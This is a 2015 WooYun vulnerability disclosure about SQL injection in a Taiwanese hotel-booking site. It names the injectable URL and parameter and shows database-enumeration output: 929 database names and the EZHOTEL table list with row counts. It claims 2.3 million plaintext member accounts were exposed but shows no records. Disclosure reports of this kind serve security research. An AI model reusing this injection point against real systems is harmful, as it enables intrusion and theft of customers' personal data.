当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099311

漏洞标题:台湾某订房网站存在高危SQL注入漏洞(230W的明文账户密码和500+的合作酒店数据库信息)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-03-03 20:55

修复时间:2015-04-17 20:56

公开时间:2015-04-17 20:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-08: 厂商已经确认,细节仅向厂商公开
2015-03-18: 细节向核心白帽子及相关领域专家公开
2015-03-28: 细节向普通白帽子公开
2015-04-07: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

230W+会员的明文账户密码、身份证、手机号和地址信息
500+的合作酒店数据库信息

详细说明:

http://www.ezhotel.com.tw/hotelwestsites.php?areano=0-33 注入点

j.jpg


漏洞证明:

1.总共928个数据库

available databases [929]:
[*] 1967TRAVEL
[*] 21RESORT
[*] 520TW
[*] 8FANKENG
[*] _LOG_PD_0
[*] A222
[*] ABBA
[*] abc
[*] ACECLUBHOUSE
[*] AGENT_CHANA
[*] AGILITE
[*] AGORAGDN
[*] AIRBUS
[*] AIRLINEINN
[*] ALEEXVILLA
[*] ALISHAN
[*] ALISHANHOUSE
[*] ALIVERESORT
[*] AMAINMOTEL
[*] AMANDA
[*] AMBA
[*] AMBASSADOR
[*] AMBH
[*] AMBIENCE
[*] ANHWA
[*] ANPIN72
[*] ANTONG
[*] APPLEDORE
[*] ARAUCARIA
[*] ARMANI
[*] ARMANI2
[*] ART_MOTEL
[*] ARTSPA
[*] ASPIRERESORT
[*] ASTAR
[*] AT_BOUTIQUE_HOTEL
[*] ATAMI
[*] AYAWAN
[*] AZURE
[*] AZUREHOTEL
[*] BACKPACKERSTW
[*] BACKPACKERSTW2
[*] BAIAN
[*] BALIHOTEL
[*] BALIMOTEL
[*] BAOLAI
[*] BARONHOTEL
[*] BAYFOREST
[*] BB
[*] bb_ch_taichung
[*] bb_chahsi
[*] bb_chashi_cancel
[*] bb_chinatrust
[*] bb_chinatrust_cancel
[*] bb_dao
[*] bb_hoy_cancel
[*] bb_hoya
[*] BB_TEST
[*] bb_westlake
[*] bb_wulin_cancel
[*] BBCHOTEL
[*] BBHOTEL
[*] BEACONHOTEL
[*] BEAUMAX
[*] BEAUTY
[*] BEAUTYHOTEL
[*] BEAUTYSPA
[*] BELLEVISTA
[*] BELLEVUE
[*] BENTLEYPARK
[*] BESTHOTELTW
[*] BICYCLEINN
[*] BIGEYE
[*] bin
[*] BINHAI
[*] BIRDS
[*] BIRDY
[*] BITAN
[*] BLUELAGOON
[*] BOSS
[*] BRHOTEL
[*] BROTHER
[*] BTSC
[*] BUGTWO
[*] BURANO
[*] bus
[*] BUSINESSCENTER
[*] BYEYER
[*] CAESAR
[*] CALLME
[*] CAMBRIDGE
[*] CAPITAL
[*] CAPITALHOTEL
[*] CARLTON
[*] CASAMIA
[*] CATCHPLAY
[*] CDHOTEL
[*] CEDARWOOD
[*] CEOUR
[*] CHAMPS
[*] CHECKINN
[*] CHENGPAO
[*] CHIEFVILLA
[*] CHINATRUST
[*] CHINATRUST_TC
[*] CHINGSHENG
[*] CHINGSHEUI
[*] CHINHUA
[*] CHINSHI
[*] CHKKM
[*] CHUANGTANG
[*] chuangtang
[*] CHUANGTANGHOTEL
[*] CHULU
[*] CHUNAN
[*] CHUNJING
[*] CHUNTENG
[*] CHUTO
[*] CINEMA7
[*] CIRRUSSPA
[*] CITIZEN
[*] CITYHOTEL
[*] CITYLAKE
[*] CITYRESORT
[*] CITYSUITES
[*] CITYSUITES_AIR
[*] CLASSIC
[*] CLOUDHOTEL
[*] CLOUDSPRING
[*] CLOUDVILLA
[*] CLR
[*] CLR2
[*] COSE
[*] COSMOS
[*] CROWN
[*] CROWNHOTEL
[*] CRUNH
[*] CRYSTAL
[*] CRYSTALFARM
[*] CRYSTALHOTEL
[*] CYH
[*] DABANGAN
[*] DAHSING
[*] DAHU
[*] DAILEI
[*] DALUKUANLAND
[*] DAYHOTEL
[*] DEBONAIR
[*] DELIGHT
[*] DELLAGO
[*] DEMO
[*] DEMO_ENG
[*] DEMO_GB
[*] DEMO_SOGOPRO
[*] DEMO_TICKET
[*] demo_utf8
[*] DEMOBANDB
[*] DHMC
[*] DHMC2
[*] DHMC_201305
[*] DHMC_DUMMY
[*] DHMC_NEW
[*] DHMC_OLD
[*] DHMC_SOGOPRO
[*] DI
[*] DISCOVERY
[*] DOLAMANCO
[*] DOLPHIN
[*] done
[*] DONGHWA
[*] DONGHWAHOTEL
[*] DONGTAIRSPA
[*] DOWNHOME
[*] DRAGONINN
[*] DRAGONNANTOU
[*] DRAGONVALLEY
[*] DREAMTOWN
[*] DREAMVILLA
[*] DRYADMOTEL
[*] DUKEHOTEL
[*] DYNASTY
[*] EADOR
[*] EASTERN
[*] EASTERNBEAUTY
[*] EASTHOTEL
[*] EASTSPA
[*] EASTSTARHOTEL
[*] ECOASTSTAR
[*] ECOFARM
[*] EDAROYAL
[*] EDASKYLARK
[*] EDENRESORTS
[*] EHOTEL
[*] EHOUSE
[*] EHRHOTEL
[*] EINHAN
[*] ELAN
[*] ELEGANCE
[*] ELITECONCEPT
[*] ELITESPA
[*] ELOVERSMOTEL
[*] ELPUERTO
[*] EMail
[*] ENGLANDCASTLE
[*] ENHAI
[*] ENSS
[*] ESHUAN
[*] ETAIWAN
[*] ETAIWANWEB
[*] ETICKET
[*] EVAAIR
[*] EVERGREEN_BK
[*] EVERGREEN_JS
[*] EVERGREEN_KL
[*] EVERGREEN_PG
[*] EVERGREEN_PS
[*] EVERGREEN_TC
[*] EVERGREEN_TN
[*] EVERGREEN_TP
[*] EVERLUCK_HOTEL
[*] EVERSPRING
[*] EZBUS
[*] EZHOTEL
[*] EZSALE
[*] EZTICKET
[*] FAMOUS
[*] FAREASTFE
[*] FARM
[*] FASHIONHOTSPRING
[*] FDLHOTEL
[*] FEA_AFA
[*] FENCHIHU
[*] FENGTYAN
[*] FENNEL
[*] FFH
[*] FHOTEL
[*] FHOTELS
[*] FHOTELSW
[*] FINESSE
[*] FIRST
[*] FIRSTHOTELTAIPEI
[*] FISHER
[*] FISHHOTEL
[*] FLEURLIS
[*] FLOWERYOUNG
[*] FORTE
[*] FORTETICKET
[*] FORTUNA
[*] FORTUNE
[*] FOURPOINTS
[*] FREECLOUD
[*] FRESHFIELDS
[*] FUCHIA
[*] FUHOTEL
[*] FUJAI
[*] FUKUOKA
[*] FULIRESORT
[*] FULLERTON
[*] FULLMOONSPA
[*] FUSHIN
[*] FUWAN
[*] FUWARD
[*] FUWARE
[*] FXHOTELS
[*] GALAHOTEL
[*] GANSHANRMA
[*] GARDENHOTEL
[*] GARDENVILLA
[*] GEAR
[*] GINKGO
[*] GLORY
[*] GLVILLA
[*] GOGO
[*] GOLDENAGE
[*] GOLDENHOTEL
[*] GOLDENPALACE
[*] good
[*] GOODGROUND
[*] GOODGROUNDTAINAN
[*] GORAKADAN
[*] GOSHENHOTEL
[*] GOYA
[*] GPH
[*] GRACE
[*] GRACEFUL
[*] GRACEGARDEN
[*] GRAND_NALUWAN
[*] GRANDFORMOSA_TP
[*] GRANDFORWARD
[*] GRANDHILAI
[*] GRANDVIEW
[*] GREEN_HOME
[*] GREENCITY
[*] GREENHOTEL
[*] GVRB
[*] GXTL
[*] H9600123
[*] HALARCINEMA
[*] HALARLIFE
[*] HALLYARD
[*] HANASEI
[*] HANDSOMEHOTEL
[*] HAPPY2006
[*] HAPPYBUSINESS
[*] HAPPYHOTEL
[*] HAPPYIN
[*] HAPPYPANDA
[*] HARAZURU
[*] HARMONYHOTEL
[*] HAUTRHIN
[*] HBJHOTEL
[*] HCHIBISCUS
[*] HCHIBISCUS_TEST
[*] HCSHOTEL
[*] HDPALACE
[*] HEFONG
[*] HEFONG_CHAHSI
[*] HEFONGVILLA
[*] HERATONTAIPEI
[*] HERHUAN
[*] HHOTEL
[*] HIEASTTAIPEI
[*] HIGHNESS
[*] HIHORIZON
[*] HLBNB
[*] HLFAIRYTALE
[*] HLHOTEL
[*] HOFONG
[*] HOGASHU
[*] HOKET
[*] HOLLAND
[*] HOMEHOTEL
[*] HONDOHOTEL
[*] HONDOW
[*] HONEYMOON
[*] HORNGYI
[*] HOSTON
[*] HOT
[*] HOTELBANK
[*] HOTELBANK2
[*] HOTELBANK_BK
[*] HOTELBANK_DEMO
[*] HOTELCHILDHOOD
[*] HOTELCOLOR
[*] HOTELCOZZI
[*] HOTELDAY
[*] HOTELHG
[*] HOTELOCEAN
[*] HOTELPURITY
[*] HOTELRICH
[*] HOTELRIVERVIEW
[*] HOTELSENSE
[*] HOTELSUKIMI
[*] HOTELSUNSHINE
[*] HOTELSUNSHINE2
[*] HOTELWO
[*] HOTHOTEL
[*] HOTSPRING
[*] HOTSPRINGWORLD
[*] HOWARD
[*] HOWARD_old
[*] HOWARDCM
[*] HOWARDKT
[*] HOWARDTPE
[*] HOYA
[*] HRESORT
[*] HSUANTSUNG
[*] HTL
[*] HUAHOU
[*] HUALIEN_NALUWAN
[*] HUALIEN_NARUWAN
[*] HUASHINTAINAN
[*] HUATONG
[*] HUAXIN
[*] HUAYANG
[*] HUSHUIANLAVILLA
[*] HVILLAMOTEL
[*] HWADU
[*] HWAGER
[*] HWATAI
[*] IAN
[*] IDINN
[*] IHOWA
[*] IMAGE
[*] IMAGE_GOLD
[*] IMARSHOTEL
[*] IMPERIAL
[*] information_schema
[*] INHOUSE
[*] INN88
[*] INNCUBE
[*] INNSPRING
[*] INONE
[*] INSKYHOTEL
[*] INYOUNG
[*] IPACKER
[*] IRESORT
[*] JADEHOTEL
[*] JENDOW
[*] JIAHUA
[*] JIHLIH
[*] JIHOTEL
[*] JINDO
[*] JINGAI
[*] JINGAN
[*] JINGLU
[*] JINHUA
[*] JINPINHOTEL
[*] JIUNING
[*] JLHOTEL
[*] JOAN
[*] JOYHOTEL
[*] JRH
[*] JSMOTEL
[*] JUNE
[*] JUNYUE
[*] JUSTAIWAN
[*] JUSTWIN
[*] JYQ
[*] KAGAYA
[*] KANEBO
[*] KANGLEHOTEL
[*] KANGNINGLIFE
[*] KATHERINE
[*] KAVALAN
[*] KDM
[*] KECHIHSUAN
[*] KELLYHOTEL
[*] KENIT
[*] KENTINGTON
[*] KETON
[*] KEVIN66
[*] KGARDENPL
[*] KHHHOTEL
[*] KINGCHENG
[*] KINGDOM
[*] KINGKINGS
[*] KINGMAMMON
[*] KINGNATIONALHOTEL
[*] KINGS
[*] KINGSETHOTEL
[*] KINGSPA
[*] KIREIHOTEL
[*] KIYATT
[*] KLHOTEL
[*] KONG
[*] KTCHATEAU
[*] KTCHATEAU_OLD
[*] KTHOLIDAY
[*] KTHOTEL
[*] KTLIJING
[*] KUKUAN
[*] KUNGKUAN
[*] KUNTAICHUNG
[*] KURHAUS
[*] KUVA
[*] KYOTO
[*] LADYHOTEL
[*] LAILAI
[*] LAKEHOTEL
[*] LAKESHORE
[*] LAKESHORE_HL
[*] LAKESHORE_M1
[*] LALASAN
[*] LANDIS
[*] LANDISLO
[*] LANDISTPE
[*] LANDMARKHOTEL
[*] LANYANG
[*] LAPING
[*] LAPLAZA
[*] LARCHOTEL
[*] LASEARESORT
[*] LAVIEGROUP
[*] LAVILLA
[*] LEADER
[*] LEES
[*] LEMERIDIEN
[*] LEMIDI
[*] LEOFOO
[*] LEOFOOGUANSHI
[*] LEOFOOHOTEL
[*] LEOFOORESIDENCES
[*] LEOFOORESORT
[*] LESCHAMPS
[*] LESHOTEL
[*] LEVILLAS
[*] LI_CHIH
[*] LIDUO
[*] LIDUOBESTHOTEL
[*] LIENFOOK
[*] LINCOLNHOTEL
[*] LINDEN
[*] LINDEN_HP
[*] LINDEN_KH
[*] LINKWORLD
[*] LIONHOTEL
[*] LISHIN
[*] LISHIUAN
[*] LITI
[*] LIUHYANG
[*] LIVINGWATER
[*] LIWU
[*] LIZHOTEL
[*] LMRESORT
[*] LOFTHOTEL
[*] LOHONEKA
[*] LONGSTAYHOTEL
[*] LONGVIEW
[*] LONGVIEWHOTEL
[*] LOTTY
[*] LOTUSHOTEL
[*] LOTUSSPA
[*] LOTUSVILLA
[*] LOVE1028
[*] LOVESPRING
[*] LSHOTEL
[*] LTCITY
[*] MABHOTEL
[*] MADISONTAIPEI
[*] MALDIVES
[*] MANBO
[*] MANGO
[*] MAPLELANDIS
[*] MARLINHOTEL
[*] MARSHAL
[*] MATSUNI
[*] MAYLIN
[*] MAZALU
[*] MEADOWHOTEL
[*] MEIHOTEL
[*] MELODY
[*] MELODYVILLA151
[*] METRO
[*] METROPOLIS
[*] METROPOLITAN
[*] MFWHOTEL
[*] MIFE
[*] MINGAO
[*] MINGGING
[*] MINGLU
[*] MINGSHAN
[*] MINGSHUO
[*] MINMEN
[*] MIT30
[*] MIYIHOTEL
[*] MIZI
[*] MMMVIEW
[*] MONARCH
[*] MONGFUN
[*] MOON_RIVER
[*] MOONGARDEN
[*] MOONVILLA
[*] MOROCCAN
[*] MOUNTAINSTAR
[*] MOVIEMOTEL
[*] MRTHOTEL
[*] MSPA
[*] MSSMOTEL
[*] MSYHOTEL
[*] MUCHA
[*] MUDANWANVILLA
[*] MULANTOP1
[*] MYRESORT
[*] MYSPA
[*] mysql
[*] mysqltest
[*] NANBAO
[*] NANRENHU
[*] NANTOUGARDEN
[*] NARUWAN
[*] NATIONAL
[*] NCZNHOTEL
[*] NEWCALIFORNIA
[*] NEWHUSHUIAN
[*] NEWLIFE
[*] NICEPLAZA
[*] NIKAIDO
[*] NONGANHOTEL
[*] NTPHOTEL
[*] OCEAN
[*] OCEANHOTEL
[*] OCEANVIEW
[*] OHYAMOTEL
[*] OKHILL
[*] OLA
[*] OLLIERE
[*] OLYMPICHOTEL
[*] ONECHUNG
[*] ONERESORTS
[*] ONESTAR
[*] ONESTARSS
[*] ONESTARTP
[*] ooxx
[*] ORIENTALHOTEL
[*] OT
[*] OURHOUSE
[*] PACIFICHOTEL
[*] PACIFICLIFE_SPA
[*] PALMERHOTEL
[*] PALMLAKES
[*] PAPAGO
[*] PAPAGORESORT
[*] PAPAGORESORT_SP
[*] PAPAWAQA
[*] PAPERSUN
[*] PARIS
[*] PARISHOTEL
[*] PARISVILLA
[*] PARKCTHOTEL
[*] PARKTAIPEI
[*] PARKVIEW
[*] PEACH
[*] PEIKUAN
[*] PENNYHOUSE
[*] PESCADORES
[*] PGS_MOTEL
[*] PHAQUARIUM
[*] PHOENIX
[*] PKCV
[*] PLATFORM
[*] PLCRESORT
[*] PLCRESORT_WEB
[*] PLENTIFUL
[*] POLOTRAVEL
[*] POWAHOTEL
[*] PRINCEHOTEL
[*] PUYISY
[*] QUALITYINN
[*] QUEENAROYAL
[*] RAGUESTHOUSE
[*] RAINBOW
[*] RAINBOWHOTEL
[*] RBVILLAS
[*] REDIN
[*] REDLANTERN
[*] REGAL
[*] REGALE
[*] REGALEES
[*] RESORT
[*] RFHOTEL
[*] RFPRETTY
[*] RHOTEL
[*] RICESPA
[*] RICHFREEDOM
[*] RIVER_RESORT
[*] RIVERHOTEL
[*] RIVERSIDE
[*] RIVERSIDEHOTEL
[*] RIVERSIDERESORT
[*] RMATAIWAN
[*] RMFH
[*] RMH
[*] ROSEHOTEL
[*] ROSEMOTEL
[*] ROSERYHOTEL
[*] ROYAL_CHAHSI
[*] ROYAL_CHIHPEN
[*] ROYAL_HC
[*] ROYAL_INN
[*] ROYALBEST
[*] ROYALBIZ
[*] ROYALCASTLE
[*] ROYALCHIAYI
[*] ROYALSEA
[*] ROYALSEASONS
[*] ROYALSPA
[*] ROYALTPE
[*] RRHOTEL
[*] RSINN
[*] RSLHOTEL
[*] RSR
[*] RUISHI_M
[*] RUISHI_N
[*] RUISHI_S
[*] SAAJUST
[*] SAKURA
[*] SANHOCE
[*] SANPO
[*] SANTAI
[*] SANWAN
[*] SANWANT
[*] SANYON
[*] SAUALKEH
[*] SAURA
[*] SDHOTEL
[*] SEAGAIA
[*] SEALIFE
[*] SEASBAY
[*] SEASONS
[*] SEATTE
[*] SECRET_CONFINES
[*] SEES
[*] SEHOTEL
[*] SERVICEAPARTMENT
[*] SFHOTEL
[*] SHANDORI
[*] SHANGHAI
[*] SHANGRI
[*] SHANGRILA
[*] SHANGRILAS
[*] SHANGRIRA
[*] SHANTE
[*] SHBH
[*] SHEIPA
[*] SHERMUH
[*] SHERWOOD
[*] SHHEIGHT
[*] SHINEYOU
[*] SHINKANSEN
[*] SHINSHIN
[*] SHINYUAN
[*] SHIUNG
[*] SHIUNGHOTEL
[*] SILKEN
[*] SILKSPLACEYILAN
[*] SINCERES
[*] SINDA
[*] SINDAHOTEL
[*] SINO
[*] SIRACUSA
[*] SKYLIFE
[*] SKYLIFESPRING
[*] SKYLINEHOTELS
[*] SKYNO1
[*] SLHOTEL
[*] SLSVILLA
[*] SLVHOTEL
[*] SMARTCUE
[*] SMLH
[*] SMOKEYJOES
[*] SOHOMOTEL
[*] SOLASRESORT
[*] SONGBO
[*] SOUTHERN_G
[*] SPA33
[*] SPA_HOTEL
[*] SPARKLE
[*] SPART
[*] SPARTY
[*] SPASPA
[*] SPLENDOR
[*] SPRING
[*] SPRINGBREEZE
[*] SPRINGHILL
[*] SPRINGPARK
[*] SPRINGRESORT
[*] SPRINGSPA
[*] SPRINGVILLA
[*] SSG787
[*] SSS988
[*] STARSHOTEL
[*] STARTRAVEL
[*] STARVILLA
[*] STHOTEL
[*] STORYBNB
[*] STREETCORNER
[*] SUAO
[*] SUITETPE
[*] SUNHOT
[*] SUNLINKSEA
[*] SUNMOONLAKE
[*] SUNMOONLIGHT
[*] SUNNY
[*] SUNPING
[*] SUNRISE
[*] SUNRISE_HUALIEN
[*] SUNSHINE
[*] SUNSHINE_VILLA
[*] SUNSHINEHOTEL
[*] SUNSPRING
[*] SUNSWEET
[*] SVILLA
[*] SVRESORT
[*] SWEETHOME
[*] SWEETME
[*] T_FORESTRAILWAY
[*] TAICHUNGPLAZA
[*] TAIPEICITIZEN
[*] TAIPEIGARDEN
[*] TAIPEIROYAL
[*] TAIPING
[*] TAIPUNGSUITES
[*] TAISHINU
[*] TAITUNG
[*] TAIWAN
[*] TALEE
[*] TANGCHYUAN
[*] TANGNO
[*] TANGYUE
[*] TAOBAO
[*] TAROKO
[*] TAROKO_HOTEL
[*] TAUTAU
[*] TAYIH
[*] TCCH
[*] TCFARM
[*] TCHHOTEL
[*] TCRS
[*] TCSHANGRILA
[*] TEA
[*] TEMPUS
[*] TENLU
[*] TEST
[*] test
[*] TEST_LANDIS
[*] THANGD
[*] THEADAGIO
[*] THECRYSTAL
[*] THEGAIN
[*] THEGALERIEHOTEL
[*] THEMOONHOTEL
[*] THEMUDAN
[*] THESPLENDORKHH
[*] THEWENWAN
[*] TIANLONG
[*] TICKETBANK
[*] TICKETBANK_CHB_SH
[*] TICKETBANK_DEMO
[*] TICKETBANK_HWATAI
[*] TICKETBANK_PANSHIN
[*] TICKETBANK_TAISHIN
[*] TICKETBANK_TC
[*] TICKETBANK_UBOT
[*] TIENLAI
[*] TILUN
[*] TINGLUNG
[*] TLHOLIDAY
[*] TLHOTEL
[*] tmp
[*] TNCHATEAU
[*] TOPPLAZA
[*] TOPROYAL
[*] TPCAESARPARK
[*] TRAINING
[*] TRANS_BELLEVISTA
[*] TRAVEL1111
[*] TRAVEL889
[*] TRAVELER
[*] TRAVELHOME
[*] TRAVELMOTEL
[*] TRAVELOCITY
[*] TRAVELWEB
[*] TREEHOUSE
[*] TSAOLING
[*] TSAOLINGHOTEL
[*] TSAULING
[*] TSUBAKI
[*] TUSCANY
[*] TW616
[*] TWEM
[*] TYGC
[*] TYQ
[*] TYYD
[*] UFDNHOTEL
[*] UHOTEL
[*] UNABABY
[*] UNIQUEHOLIDAY
[*] UNITED
[*] urania
[*] URTRAVELLER
[*] URTRIP
[*] USTAY
[*] VHOTEL
[*] VICTORIA
[*] VILLA393
[*] VILLA_SPA
[*] VIOLETBAY
[*] VIPHOTEL
[*] VIPSPA
[*] W5BESTHOTEL
[*] W9612888
[*] WANGFU
[*] WANLI
[*] WATERMARK
[*] WECAN
[*] WEISENHOUSE
[*] WELCOME
[*] WELFARE
[*] WENPIN
[*] WESTGATE
[*] WESTIN
[*] WESTLAKE
[*] WHRESORT
[*] WINDSORTAIWAN
[*] WOOFU
[*] WTHCLUB
[*] WULAISPRING
[*] WWHOTEL
[*] WWW
[*] WZHOTEL
[*] XIAFEI
[*] XIMEN
[*] YAMAKAWA
[*] YANOLD
[*] YAWAN
[*] YEARS
[*] YEN
[*] YENJIM
[*] YENTAI
[*] YESMOTEL
[*] YESO
[*] YEZE
[*] YEZE_C
[*] YEZE_M
[*] YINSHERB
[*] YIPINYUAN
[*] YIYUAN
[*] YOAI
[*] YOHO
[*] YOOUSHAN
[*] YORKER
[*] YORKTS
[*] YSOARLAN
[*] YSTICKET
[*] YUANTANG
[*] YUCHENO
[*] YUEYA
[*] YUHAO
[*] YUHCHYR
[*] YUHTARNG
[*] YUHTONG
[*] YUNDENG
[*] YUNHSIEN
[*] YUNOYADO
[*] ZENDASUITES
[*] ZENINN
[*] ZKHOTEL
[*] ZUSIN


2.通过EZHOTEL泄露大量敏感信息

Database: EZHOTEL
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| ClickCountWeb_2008              | 14113477 |
| API_Connect                     | 13420770 |
| ClickCountWeb                   | 10409961 |
| ClickCountWeb_2009              | 7390402 |
| Login                           | 6935573 |
| TIP_EXEC                        | 2338585 |
| MemberLoginLog                  | 2330533 |
| Ticket_API_Log                  | 2200926 |
| TBL_Log                         | 1206330 |
| SEOInfo                         | 814398  |
| B2B2C_ClickCount                | 646574  |
| weather                         | 409148  |
| FN_OrderInfo                    | 304788  |
| MultiPromotionPrice             | 173571  |
| Access_Session                  | 158162  |
| PlatForm_AD_TimesReport         | 129699  |
| EAN_Region                      | 124125  |
| PlatForm_AD_TimesReport_2010_03 | 116936  |
| MultiPromotionRoomQty           | 107043  |
| IPDatabase                      | 78921   |
| PKI_Use_Info                    | 72545   |
| b2b2c_orderinfo                 | 69746   |
| E_InvoiceData                   | 52620   |
| Sure_News_SendMailLog           | 52390   |
| FN_OrderInfo_Cancel             | 34134   |
| PlatForm_Count                  | 32669   |
| b2p_user_log                    | 31322   |
| EZHotelInfo1_bk                 | 29890   |
| AcerSN1                         | 28002   |
| Journal                         | 23063   |
| IbonGetTicket                   | 21872   |
| ezHotel                         | 20944   |
| WorkSheet                       | 19712   |
| b2p_orderinfo                   | 18687   |
| HotelOrderListSSL               | 16041   |
| BulletinMail                    | 16028   |
| TIP_Product                     | 13486   |
| b2p_user_access_session         | 13383   |
| TRAVEL_TK_OrderInfoDetail       | 11853   |
| EAN_HotelInfo                   | 11612   |
| AcerSN2                         | 10208   |
| WEB_RANK                        | 7481    |
| b2b2c_orderinfo_waiting         | 6010    |
| TrustMall_Coupon                | 5956    |
| test_duncan                     | 5753    |
| TRAVEL_TK_OrderInfo             | 5699    |
| AccessInfo                      | 5384    |
| DiscountCount                   | 4797    |
| MultiOrderInfoC                 | 4661    |
| MIS_Contact                     | 4622    |
| MultiOrderInfoB                 | 4588    |
| CustInfo                        | 4551    |
| ExchangeInfo                    | 3439    |
| B2A_Agent_Session               | 3215    |
| FN_OrderInfo_TicketGo           | 3011    |
| HotelContract_Detail            | 2841    |
| Mail_Question_SendLog           | 2622    |
| FN_OrderInfo_B2B2C              | 2601    |
| MIS_Contract                    | 2457    |
| MultiCancelSet                  | 2358    |
| TaiwanPass                      | 2335    |
| MultiOrderInfo                  | 2332    |
| MultiCardInfo                   | 2328    |
| MultiINVInfo                    | 2328    |
| FN_OrderInfo_Shopping           | 2151    |
| ClickCountIP_black              | 2125    |
| EZHotelInfo                     | 2100    |
| EZHotelInfo1                    | 1954    |
| ADInfo                          | 1910    |
| FN_OrderInfo_Other              | 1900    |
| TrustMall_LabarPlayInfo         | 1888    |
| Address                         | 1831    |
| B2A_CompanyInfo                 | 1788    |
| Address_Detail                  | 1768    |
| B2A_SendMailLog                 | 1570    |
| EZHotelInfo3                    | 1531    |
| GrouponCode                     | 1500    |
| MIS_Company                     | 1428    |
| Msg_CustSysResponse             | 1414    |
| Channel_Relation_RoomType       | 1369    |
| Surehigh_Message                | 1297    |
| MultiPromotionB                 | 1223    |
| HotelContract                   | 1117    |
| PlatForm_AD_Info                | 1113    |
| HotelIntro                      | 1064    |
| b2p_layout_data                 | 998     |
| CountryCode                     | 919     |
| Msg_SystemNoticeToHotel         | 909     |
| HotelStatus                     | 854     |
| MRTNearHotel                    | 854     |
| HotelKeyLoc                     | 826     |
| ThemePromotionDetail            | 767     |
| b2p_user_access                 | 718     |
| HotelKeyInfo                    | 694     |
| b2p_hotel_contact               | 673     |
| B2B2C_AgentInfo                 | 665     |
| Address_Street                  | 650     |
| MultiHotelOrderListSSL          | 642     |
| MultiPromotion                  | 629     |
| DHMC_Amount_Adjust              | 582     |
| B2A_AgentInfo                   | 556     |
| FN_OrderInfo_BBCTK              | 547     |
| bd_order_detail                 | 543     |
| FN_OrderInfo_TC                 | 496     |
| CustServContent                 | 462     |
| HotelFactory                    | 434     |
| TWHotel_Relation_RoomType       | 433     |
| Paymenttype_Response            | 385     |
| EpaperSubLog                    | 383     |
| Address_City                    | 376     |
| PKI_Info                        | 374     |
| AdminInfo                       | 339     |
| Channel_Relation_Hotel          | 331     |
| Channel_Relation_On             | 326     |
| bd_menu                         | 319     |
| AdminInfo_Detail                | 317     |
| FN_OrderInfo_B2B2CTC            | 314     |
| Web_UserCount                   | 302     |
| WorkSheetInfo                   | 289     |
| Access_Sub                      | 276     |
| BulletinInfo                    | 255     |
| HotelLocLang                    | 252     |
| Country_Code                    | 248     |
| EZCustInfo                      | 245     |
| CustServMsg                     | 233     |
| EZHotel_Question                | 229     |
| FN_OrderInfo_TicketGo_Cancel    | 229     |
| b2p_layout_sub                  | 226     |
| CountryInfo                     | 218     |
| bd_order                        | 192     |
| Mail_Question_Waiting_SendLog   | 192     |
| AgodaPrice                      | 185     |
| AccessSub                       | 184     |
| weather_desc                    | 181     |
| WorkSheet_PMS                   | 180     |
| BBC_Hotel_On                    | 168     |
| MIS_Type                        | 163     |
| BirthGreeting                   | 158     |
| Access_Main                     | 154     |
| weather_detail                  | 147     |
| TWHotel_Relation_OrderInfo      | 145     |
| Address_Area                    | 135     |
| Msg_SystemNotice                | 135     |
| Promotion_To_Coupon             | 122     |
| TWHotel_Relation                | 118     |
| HotelLoc1                       | 116     |
| HotelLoc                        | 115     |
| HotelLoc3                       | 115     |
| B2A_AgentInfoB                  | 106     |
| GDS_RoomInfo                    | 103     |
| UpdateOrderInfoLog              | 103     |
| FB_PageInfo                     | 101     |
| MultiOrderInfoMapping           | 99      |
| TaiwanGo_Collections            | 88      |
| taipeifood                      | 83      |
| AIR_Route                       | 82      |
| b2p_user                        | 79      |
| AIR_Batch                       | 77      |
| HotelFacilities                 | 66      |
| MultiPromotionGroup             | 63      |
| bd_type                         | 59      |
| THSR_TicketPrice                | 56      |
| EventAttendEmail                | 55      |
| FB_UserInfo                     | 55      |
| RoomFacilities                  | 54      |
| rate_currinfo                   | 53      |
| Schedule                        | 53      |
| b2p_layout_main                 | 52      |
| GDS_HotelInfo                   | 51      |
| simple_email                    | 51      |
| ThemeProductDetail              | 51      |
| ClickCountIP                    | 50      |
| FN_OrderInfo_Shopping_Cancel    | 50      |
| DeleteFNOrderInfoLog            | 48      |
| Access_Title2                   | 44      |
| Department                      | 42      |
| Sure_News                       | 42      |
| Surehigh_News                   | 42      |
| HotelIntroIndex                 | 39      |
| Sure_News_Detail                | 37      |
| Paymenttype_Detail              | 36      |
| FN_OrderInfo_BBCTK_Cancel       | 35      |
| Multi_DB_Relation               | 35      |
| ThemePromotion                  | 35      |
| bd_shop                         | 33      |
| weather_loc                     | 28      |
| Address_State                   | 26      |
| E_InvoiceNumber                 | 26      |
| TrustMall_LabarGiftLog          | 25      |
| AccessMain                      | 24      |
| bd_action                       | 24      |
| FB_PublishInfo                  | 24      |
| HotelHot                        | 23      |
| b2p_user_group                  | 19      |
| Surehigh_Files                  | 19      |
| WorkSheet_Request_Type          | 19      |
| AccessSub_Extra_Set             | 16      |
| E_InvoicePrize                  | 16      |
| b2p_menu_sub                    | 15      |
| HotelType                       | 15      |
| HotelTypeLang                   | 15      |
| FB_PageNews                     | 13      |
| rate_exchange                   | 13      |
| Surehigh_Education              | 12      |
| Access_Title1                   | 11      |
| DataBaseRelationShip            | 10      |
| b2p_menu_main                   | 8       |
| B2A_MsgPost                     | 7       |
| HotLink                         | 7       |
| MultiPromotionAddon             | 7       |
| HotelType1                      | 6       |
| TrustMall_LabarGiftInfo         | 6       |
| Address_State_Class             | 5       |
| B2B2C_ADInfo_Detail             | 5       |
| b2p_company                     | 5       |
| Address_City_Class              | 4       |
| AIR_Airline                     | 4       |
| CharSet                         | 4       |
| CheckTotalPrice                 | 4       |
| Address_Area_Class              | 3       |
| Address_Street_Class            | 3       |
| B2B2C_ADInfo                    | 3       |
| Msg_SystemNoticeType            | 3       |
| MailingList_Confirmation        | 2       |
| MemBonusInfo                    | 2       |
| NET_Price                       | 1       |
| PromotionEvent                  | 1       |
| Report_Relation                 | 1       |
| RoomNotification                | 1       |
| TaiwanGo_Cases                  | 1       |
+---------------------------------+---------+


